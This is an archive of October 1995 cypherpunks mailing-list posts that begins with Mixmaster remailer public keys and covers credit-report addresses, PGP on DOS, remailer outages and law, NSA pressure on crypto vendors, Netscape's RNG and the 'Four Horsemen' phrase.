q5ERILOd1hMNKY9XLNFYM30mUR/Fkh0MnYI/ujWz
OTb0rR2a31nvmaLMdaB75nTdGJwHitCmo8k2eTjL
XQsXV6zKrzXGp8H8NO34DAFWJy1qVcev+6lLAWGy
j/fsJJyJNtl94wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

replay remailer@replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11

- -----Begin Mix Key-----
e3e2b4d67314b6165ee03b0b0ae07a7f
258
AATZBfJhv+DGg4OEfQfgVnzZZpumEZHI9CES+Ux2
dBp9RBPpJnAtLpcAyCIkNjSaik0togcKhFgcR3nt
XIrWclJ/uO/Z1fqW7ESLwzXozCpqnG5S/y6mUPuL
yzA9bqtAGd+pvxuK/Cw2Zzx+1QGp0VtWb46KxqvC
S4POHYFljkrQiQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

hacktic remailer@utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222 2.0b11

- -----Begin Mix Key-----
bf61835a7b3cfa59c409caeab4e8a222
258
AATkwgy72zwwavCHn1OytNMsBYAIBnCFa2hcbZPi
IN6eS4jDgFdld5DlcqqzdN6Lxv96i0Dg7ElFyAFR
5zmof3oaNqh5vbq/fTEbvFtX9EGyuqkfN6fKoAEv
G7gtmkfosoIg/jnI8AL9KC/J5mGaxrWYB6XBe+v9
iI1pOSbPsDCsdQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

crynwr remailer@crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11

- -----Begin Mix Key-----
64c62de6b347b3050fbb6e94c649112d
258
AATLe0CWPSn844FCeL7FzUlf+vE2qfYBPs/8PYYm
BfITjknJjD0dk7vXhX9Qc5PFgDWRHhVoIRlFT3sc
Jp2UVFLOZ5zn/WiT9Wa1tZsqejDf3MRIDT/K6cHB
uB/SUaxLzNfk/wG1uBTUHukdjwCyDxNLHuYA5mVz
opYJhQR0Nc/ESQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

spook remailer@valhalla.phoenix.net ca8c8679f7b1cbdcff46d780fba97673 2.0

- -----Begin Mix Key-----
ca8c8679f7b1cbdcff46d780fba97673
258
AATZXVb4yP3MGt/ZCR5FtrHPMgYNyXHBmnG8KWO0
UaT5jbMqBdRQEzOVrCN/5RXerpS8Hctbc5MrwhSr
fh/byQLwLkY50zYAxWSRBpaAJgZtCnQtVTgmt9yu
BDiCE2OasFnZlwsi+9t8+c5R2bS3C6UhjQsgybbF
Aw7xWK3v3fPJqQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

flame remailer@flame.alias.net 64bbf500097b541a8ddcb2dd80373238 2.0b11

- -----Begin Mix Key-----
64bbf500097b541a8ddcb2dd80373238
258
AAS5NFs7yPSFv+WwpO26/2OS7CYJDtrhlrEasf8S
jJ9P0jqWXuorDIMKT3YfvSkk2xKqAHiHrOFEqltY
plIUCoXyAf/7CmNyPYdTN6xNxO74ZIsTQnNgAJT3
6a8+JL92DZJM6pYfhpSvPq7lj5X0h6Hj/oCAlqiS
31TZJkd2jenjDQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

gondolin mixmaster@gondolin.org 1d767b08fefa0a79d508be73e472d326 2.0.1

- -----Begin Mix Key-----
1d767b08fefa0a79d508be73e472d326
258
AATAwVkC3FI6NDi0GJvH+FBIK6MYVHvXofEoKMTc
u7P1rI7yCW00JOF71k373wyepZDksw9wjZdrHZAB
uyN7SICMaKPRvMA4rseZFjefzYaoFf5tO0OqFgcQ
/pMOPDwYl0nHyuLJvqjpADMDtatQaN2+/T/HtcMX
Q1KCcLk24jEWbQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----


q q@c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1

- -----Begin Mix Key-----
c44e1cb0f0709465c21b07ac972bf973
258
AATDBaiKBy4jPlRUIQmVvcjO/GhWLbsls+mKloml
5EScYl+3fGw04P4xVcWOSledFVxKVfNy+xTVI8pE
XGXSr0cRUIa1NttzNPk/KObb5SvkeqGtWAyRiWBS
G91MkWM6LbqzKPcu6gUON47wJCJCzdvgbUIeVJIT
MnyBvMWJX5CKAwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

Armadillo remailer@armadillo.com 7251877ae6fed509ebf7567715974d1b 2.0.1

- -----Begin Mix Key-----
7251877ae6fed509ebf7567715974d1b
258
AASWRIpH97WDVCNc/kiLqvmxqwN9cAAbZFi+FIwr
gCixQRTtD/SXuXd62iIqRMp3xm4c+uSnTzLijIxi
fCYLacNMVeh0PXAszfFIh6CBicPq1UWt82Wu5dqw
K/goNULqNDUypGQtOfOpHSQKPwAphXplKhv75OZs
SjtMoEcv0CCk3wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

secrets secret@secret.alias.net bc2e4251dbddfa74dfae8b274904c2be 2.0.2b

- -----Begin Mix Key-----
bc2e4251dbddfa74dfae8b274904c2be
258
AATBBbpmFw7omad8hpvxQiylmoi5MBXs5SivpcY6
65jnhZIiL9HvTE+Rq+30STccDsQWze0/iZthg1RL
tCXYtABwkfsHOf60/aq1aOBobkquzBItvzQMG0W/
TkVinZYUTqfdytl/pfLDIQiXv7Z0t98MrLsmVopE
1NQS7sH6g9srFwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

anon mixmaster@anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b

- -----Begin Mix Key-----
e3ca4cc5beb9934ae6d52dd27da80332
258
AATZuNYrX4bw6A01PA00qMr7KeJsnHIq9wYoSc5P
OrHUEvPUoCxmLfuhwF9eEfSkV4t9DLPIMhKXM4iL
Afhv2IZKeWaA98q4NHb6E7Gg6/e6uCI1O3nmXXK8
la4ij9RneCHig5K6JlCh3MJTkuW/IEYQjMrz2/H5
RUDEwx+/HL5K0QAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

wmono wmono@valhalla.phoenix.net f68e6add16880b60eb48a4a4330e2e36 2.0.1

- -----Begin Mix Key-----
f68e6add16880b60eb48a4a4330e2e36
258
AASe+l+eIE1GYugbIPDG87h9wIFD0KqLWrMiN0PN
RBCmRwsHOu1mZDnJTPlg7RXI17+DJMkk+huGPTuA
T+KilAv8WFKWmvHuOpIBwxVBMXFKHsrQYHES63t0
UMQvRCv9LXZZvmiBWKrZp5vQaSOZKYLf4v3pQw7U
SsbB5geSP9fQ2wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----


 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp, a Pine/PGP interface.

iQEVAwUBMIJKdaghiWHnUu4JAQHNJQf/YVjJn/WFKTi5gdjtnkOy5DprQYcoiAZ3
44/d4fq34cYdghEaK2WnROXqUn+nQbd2xqDt68KdG9Y+AsyzYo0oue+ec/juevH7
CobBO/E45dR2Ey7eUBhp/cjAJcF/R+BCGPFsrvVFjZETUhRougqWP/d0w1nxyuUI
Z0BPqiLEU/Zi7tTf++qK12YFHc0bBFk52jc2rjlwk4MDcra/Gihf834fZ6QB3nRT
mcpKaWQB2NODXwT8VOr19Fv44EyKx+QsNMX5DREcLB/GxKZjgsSArFSGRg6AiR+k
VMAwO07JSXr85/EKrbepSIWQQM19jGB7tQq6UpkLERbFQmx/yrgAwA==
=jYbQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Date: Mon, 16 Oct 95 04:35:37 PDT
To: cypherpunks@toad.com
Subject: was: My chat with Goeff Greiveldinger
Message-ID: <951016073248.44606d5d@mitlns.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Previous post:

>I've heard cracking into Equifax and TRW is considered a rite of passage in 
>the phreaker crowd. The security would have to *damn* tight (as in forget 
>it) for it to be trustworthy. And since it would probably be the big three
>credit rating agencies (I forget the other one), their track record is not 

 Here are the three credit reporting orgs plus the medical reporting org.
 The cost is $8 to get your report.

----------------------------------------
CBI Equifax Credit Information Services
PO Box 740256
Atlanta, GA 30374
----------------------------------------
Trans Union
Consumer Relations Center
208 South Market
Wichita, KS 67202
----------------------------------------
TRW
National Consumer Assistance Center
PO Box 749029
Dallas, TX 75374
----------------------------------------
Medical Information Bureau
PO Box 105 Essex Station
Boston MA 02112
----------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Mon, 16 Oct 95 04:35:34 PDT
To: cypherpunks@toad.com
Subject: PGP out of RAM
Message-ID: <95Oct16.073513edt.1500@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


It seems PGP has been too successful.  I downloaded the entire keyring
from keys.pgp.net; it's almost 9Mb of ASCII armour.  However, I can't
get PGP for DOS to process the files.  It, understandably, gives me an
Out Of Memory error.  Is there any sneaky way of getting around this,
barring the obvious switch to PGP for Linux?  It seems PGP is constrained
to the basic DOS 640Kb, or 704Kb if I remove my VGA card.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 16 Oct 95 07:56:30 PDT
To: Wei Dai <weidai@eskimo.com>
Subject: Re: transaction costs in anonymous markets
In-Reply-To: <Pine.SUN.3.91.951016011355.2241A-100000@eskimo.com>
Message-ID: <Pine.SUN.3.91.951016074023.1719B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 16 Oct 1995, Wei Dai wrote:

. . .
> Two main components of transaction cost in an anonymous market will be 
> the cost to maintain anonymity and the cost to evaluate reputations.
. . .
> The second big part of transaction cost in an anonymous market is 
> reputation evaluation.  Of course, normal, everyday transactions require 
> reputations to be evaluated.  However, more effort and cost will be 
> expanded on these evaluations in an anonymous market because the effects 
> of misevaluations will be much more damaging.  Reputations must be 
> constantly reevaluated, as pseodonyms are easily transfered.  Since no 
> good theories of reputation currently exist, these evaluations are 
> difficult to automate.  Perhaps theoretical advances can make these 
> evaluations easier and/or more accurate.  However there does not appear 
> to be any major research effort in this area.

This is only true if you assume everyone will do their own
reputation evaluation.  This is a third-party insurer problem,
really.  Either a "Lloyds of London" or a "Good Housekeeping" 
model would do the trick.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 16 Oct 95 00:40:35 PDT
To: remailer-operators@c2.org
Subject: RE: robo remailerRE: robo remailer
In-Reply-To: <199510142157.WAA25454@utopia.hacktic.nl>
Message-ID: <199510160740.IAA01621@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


nobody@REPLAY.COM (Anonymous) wrote:

> Is the remailer "robo@c2.org" a PGP remailer?
> In the remailer-list, it is not listed as such and yet it has a
> public PGP key (dated 5/7/95)?  Also, is it robo or ROBO, or 
> doesn't the case matter?

From what I heard last week, the remailer operator's account at
c2.org expired and was cancelled, thus the remailer is down.
Previously, it had been a full-fledged cypherpunk-type remailer,
with Type II (Mixmaster) capabilities, to boot.

Such are the uncertainties of using remailers.  What would have been
nice, of course, would have been for Sameer (sameer@c2.org), or
whoever runs Community Conexxion, to post a bulletin here giving
everyone a few days' notice before pulling the plug on this
remailer.  Undoubtedly, people are still chaining through it and
wondering why their messages/posts are not showing up.

NOTE:  People with anon reply blocks from alpha.c2.org that chained
through robo need to replace them, or risk lost messages!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Leishman <jleishma@ozemail.com.au>
Date: Sun, 15 Oct 95 16:45:55 PDT
To: cypherpunks@toad.com
Subject: JOin List request - help please
Message-ID: <199510152345.JAA28781@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Have tried on MANY occassions to join your list. The resultsd are commonly,
in varitions of;
Date: Tue, 12 Sep 95 15:44:37 PDT
To: jleishma@ozemail.com.au
From: Majordomo@toad.com
Subject: Your Majordomo request results: Re: Your Majordomo request results:
Reply-To: Majordomo@toad.com

--

Your request of Majordomo was:
>>>> subscribe Cypherpunks
**** subscribe: unknown list 'Cypherpunks'.

Please please, could I be joined <sob>   <g>

 ---------------------------------------------------
  >>--> -*-_|\                  John Leishman in Tropical Darwin
       /      \            Wk (61) (089) 81 8155 Hm (61 (089) 81 9697
       \_.--._/            Mobile (61) 018 089 631 Fax (61)(089) 819415
             v            E-Mail jleishma@ozemail.com.au 100026.157@compuserve





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Date: Mon, 16 Oct 95 06:27:13 PDT
To: jim@acm.org
Subject: Re: Why commercial key escrow? [Re: My chat with Goeff Greiveldinger]
In-Reply-To: <199510160257.TAA23550@mycroft.rand.org>
Message-ID: <199510161311.NAA06302@orchard.medford.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> As a data point, Dorothy Denning is increasingly pessimistic that
> this plan will in fact result in the same weak or escrowed system
> being used domestically; if it doesn't, that presumably triggers
> Louis Freeh to head back to the Hill for more legislation.

Yup, those of us who already paid the up-front cost to build two
versions of our products are not about to *weaken* our domestic
version just to go back to having only one version.

					- Bill

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMIJZO7T+rHlVUGpxAQGJJwQAgewBBehZWJMDN4gl2BBeZKEeQqpF86l5
GCqwXDcZEPjeFnNg4P2bIjHZ7UAu/DNMcABN8ZBmqusAkSEa28m3MFigIcTdnrO7
vKM8LuKj8rC95ig6hjJ20RitUF820BnQjRsIBQafa96J9rav1nZpX2UeZ8Ad9l6y
BfTjGVqAEig=
=zSSz
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 16 Oct 95 09:21:14 PDT
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: robo remailer
In-Reply-To: <199510160740.IAA01621@utopia.hacktic.nl>
Message-ID: <199510161615.JAA02394@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Such are the uncertainties of using remailers.  What would have been
> nice, of course, would have been for Sameer (sameer@c2.org), or
> whoever runs Community Conexxion, to post a bulletin here giving
> everyone a few days' notice before pulling the plug on this
> remailer.  Undoubtedly, people are still chaining through it and
> wondering why their messages/posts are not showing up.
> 

	Account cancellations are automated. The account holder is
notified if pending deactivation 14, 7, and 3 days before the account
is deactivated. It is the remailer-operator's responsibility to notify
the world that the remailer will be going down. It is not my
responsibility to keep track of which remailers are running on c2.org
and which aren't.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Sun, 15 Oct 95 18:42:30 PDT
To: tedwards@Glue.umd.edu (Thomas Grant Edwards)
Subject: Re: PA Remailer Concerns
In-Reply-To: <Pine.SUN.3.91.951015155654.19623C-100000@volt.isr.umd.edu>
Message-ID: <199510152238.AA43670@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>I am sure no PA state legislator knows what an anonymous remailer is.
>They have just made them illegal though.  The question is, will the police
>ever figure out what they are, and will they ever bother to selectively
>enforce the law.

More likely the law will be used when a remailer operator wont play ball with
the local LEA and surrender any existing logs. Then the LEA can simply throw
the operator into a court under this legislation.

If (when?) something serious is perpetrated and planned using a remailer then
they will have the motivation to shut them down.

Cheers,
Mark
mark@lochard.com.au
The above opinions are rumoured to be my own.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@interlog.com>
Date: Mon, 16 Oct 95 06:33:26 PDT
To: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Subject: Re: [NOISE] PGP out of RAM
Message-ID: <199510161333.JAA14631@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:35 10.16.1995 -0400, SINCLAIR  DOUGLAS N wrote:
>It seems PGP has been too successful.  I downloaded the entire keyring
>from keys.pgp.net; it's almost 9Mb of ASCII armour.  However, I can't
>get PGP for DOS to process the files.  It, understandably, gives me an
>Out Of Memory error.  Is there any sneaky way of getting around this,
>barring the obvious switch to PGP for Linux?  It seems PGP is constrained
>to the basic DOS 640Kb, or 704Kb if I remove my VGA card.

Use the 32-bit DOS version; that solves most memory problems.  (Caveat: I
haven't tried rings that large myself, so if you're already using the 32-bit
version then I'm wrong.)

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Mon, 16 Oct 95 02:41:05 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: PA Remailer Concerns
In-Reply-To: <aca715081d0210044fe2@[205.199.118.202]>
Message-ID: <9510160939.AA08616@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:
[...]
 > One of the Four Horseman, probably.
[...]

I feel really dumb, but what is that "Four Horseman" thing ?
[i saw that several times quoted on the list but I never understood,
nor found in faq,...]

Thx in advance for enlighting me

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

munitions break $400 million in gold Chirac mururoa NORAD genetic




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 16 Oct 95 10:22:48 PDT
To: cypherpunks@toad.com
Subject: The NSA Visits Compendium
Message-ID: <aca7dbbd26021004fefd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



* Does the NSA really visit companies planning to include crypto modules
and ask them to weaken or remove the crypto modules?

* How do such visits occur?

* What happens if a person or company simply refuses to meet with the Men
in Black and says "This is a free country--get lost!"?

* What pressures are brought to bear on companies to induce them to weaken
crypto, even for domestic-only use, or to remove hooks?

* Is there concrete evidence of these things?

We've all heard that the NSA sends representatives to software companies
planning to included crypto or crypto "hooks" in software. There have been
anecdotal reports of visits to many software companies.

The question is: how _real_ are these reports and what are the mechanics of
the visits? Are they urban legends, or real?

I asked these questions at the last Bay Area Cypherpunks meeting, and got
some interesting responses. In particular, I was interested in the
comparison to the other report about academic papers being submitted to a
review board, since the late 1970s. Whit Diffie of Sun and Matt Blaze of
AT&T (or, as Matt put it, maybe BT&T or CT&T, depending) shared their
experiences. They confirmed that such a panel _does_ exist, but that it is
fairly ineffectual. Apparently many people publish without approval.

(Anyway, I'm citing this as a parallel to what I'm looking for: direct
confirmation of NSA pressure and visits.)

I have volunteered to compile a compendium of reports, with or without
names attached (see details below), to pin down the extent of NSA coercion
or "subtle encouragement" of companies.

I believe this is a valid "Cypherpunks-type project," as it is aimed at
using the Net to compile a listing of experiences software developers have
had.

To kick things off, I'll start the list below:

---

Example: Large relational data base company.

NSA Actions: Visits on a regular basis by two NSA representatives ("always
two"). Pressured them to drop plans for a strong domestic crypto module.

Source: Personally told to me by programmer at the company, 1995-10-14. He
wishes the company not to be named.

Description: The NSA was concerned about plans the company had for a
domestic-only 128-bit RC4 usage, and "sat on" the company's CJ request for
an exportable version of their product using 40-bit DES. After hearing
nothing for a long while, and pestering the NSA (or maybe the State
Department), the company finally backed-down on the plans for the 128-bit
RC4 use, told the NSA this, and then the government rapidly approved the
40-bit version for export. Coincidence?

---

So, send me your examples. Supply as much detail as you can, including
company names if possible. I'll accept "unnamed sources" if they are
_primary_ sources, but no "friend of a friend told me that...," unless the
details look very convincing.

Use remailers if you wish. Use my public key if you wish, too, though
remailers accomplish the same thing, at least for getting the details to me
anonymously.

My public key is:

pub  1024/54E7483F 1992/11/20 Timothy C. May <tcmay@netcom.com> 11-20-92
          Key fingerprint =  8C 79 1C 1B 6F 32 A1 D1  65 FB 5F 57 50 6D D3 28


(I don't have MacPGP integrated into Eudora Pro---perhaps the NSA paid
Qualcomm a visit?--so I'm not a huge fan of getting PGP-encrypted messages
unless there's a real need.)

I'll be releasing reports on this on a regular basis. The next one when
I've accumulated several examples.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Mon, 16 Oct 95 10:50:04 PDT
To: cypherpunks@toad.com
Subject: Re: NEW Netscape RNG hole
Message-ID: <30829B5D.41C6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


[I sent this to the wrong address last week. A side effect seems to that
I now I have an anonymous ID.]

RingZero wrote:

> However, Netscape had not revealed enough information about
> their RNG to allow myself or other reviewers to determine how
> critical it was. If, for example, this seeding function were
> called once every time a secure connection were established,
> losing a handle would be a major problem.

Yes. The README was not as explicit on this point as my original
message. SEC_SystemInfoForRNG is indeed among the global initialization
routines.

> This seems like a good reason to ask for the code for
> SEC_RandomUpdate().

As was stated in the README, I cannot publish that code. It's derived
from (and remarkably similar to) code that Netscape has licensed. It's
not ours to divulge.

> You show us from what sources you gather bits,
> but you don't show us how you mix them or, for that matter,
> stream out "random" bits.

There seems to be little point in extracting isolated lines of
code out of the source to "prove" that we use the functions we
claim to use. If you have familiarity with RSAREF or the BSAFE
toolkit, you will be able to see how we mix and extract the
"random" bits.

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Mon, 16 Oct 95 03:27:58 PDT
To: Frank Stuart <fstuart@vetmed.auburn.edu>
Subject: Re: [NOISE] was Re: java security concerns
In-Reply-To: <199510100639.BAA19818@snoopy.vetmed.auburn.edu>
Message-ID: <199510161024.LAA11745@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



| This is a bit off-topic, but hopefully interesting.
| 
| Rather than trying to prove a program to be correct (which I agree is doomed
| to failure for the forseeable future for all but trivial programs), perhaps
| it would be useful to have an automated therom-prover to try to deduce
| "interesting things" about certain programs such as "this program always
| bounds-checks its input", "this program allows writes to arbitrary files on
| lines x, y, and z", "this program halts". (:>)

I'm doing a PhD on runtime information flow analysis of programs,
tracking each datum and who has contributed to it. Each datum has an
associated set of subjects that has contributed, and each system call
checks whether all subjects in the set are granted the call or not.
This tracking is done by compiled-in 'shadowing' code, compiled in
into the binary, and the code is inserted based on something similar
to 'data flow' analysis.

Its messy, but I think it might work out in the end. This kind of
access control is much better suited for extensive communication
between different subjects than the current paradigm of having
an owner of the process. 

With the current concept, it is imperative for the process to
filter and controll each datum entering the process, since it might
be 'hostile'. (The current concept of identity is really based on
*partitioning* an expensive computing facility, without communication
between the different partitions.) I believe this task to be to 
burdening in the long run.

With "my approach", you can accept any input without fear, since
it will be stopped when your application does the syscall.

I just started, so I don't have anything concrete yet. I'll have it 
in five years! :-)

| Obviously (as the last example illustrates), this isn't perfect because
| something can be true without being provable.

Why ever prove anything else but a trace of actual execution? This is
usually almost trivial, you don't have the problem of calculating the
proof for all possible branches, etc...

| Further, it's likely that assumptions must be made about system calls, 
| libraries, and the  ways in which they interact.  

It might be fruitful to do it for an actual system, although I think
that this "paradigm"-shift will influence a lot of the design of the
system.

| However, I think such a tool would be useful because 
| it may quickly point out things not obvious to (most) humans
| and getting some idea of what can't be deduced and why would be instructive.

Tell me if your planning to do something along these lines, it would
be most interesting.

Regards,
	Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 16 Oct 95 03:56:12 PDT
To: dl@hplyot.obspm.fr
Subject: Four Horsemen (was Re: PA Remailer Concerns)
In-Reply-To: <9510160939.AA08616@hplyot.obspm.fr>
Message-ID: <3541.9510161053@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Laurent Demailly <dl@hplyot.obspm.fr> writes: 
> I feel really dumb, but what is that "Four Horseman" thing ?
> [i saw that several times quoted on the list but I never understood,
> nor found in faq,...]

You sure about the faq, grepping reveals:

    8.3.4. "How will privacy and anonymity be attacked?"
[...]
           - like so many other "computer hacker" items, as a tool for
              the "Four Horsemen": drug-dealers, money-launderers,
              terrorists, and pedophiles.

   17.5.7. "What limits on the Net are being proposed?"
[...]
           + Newspapers are complaining about the Four Horsemen of the
              Infocalypse:
             - terrorists, pedophiles, drug dealers, and money
                launderers

ie the idea that hysterical media demonization is used as a tool to
justify the net, a witch hunt.  A tatic in general: if you can make
something look bad in the eyes of the world, if you can sway public
opinion, you can do what you wish, and be applauded for it.  So, the
spread of untrue, or greatly exaggerated stories, as a conscious ploy
to obtain this effect.  Popular tatic of Freeh at the moment.  "Oh
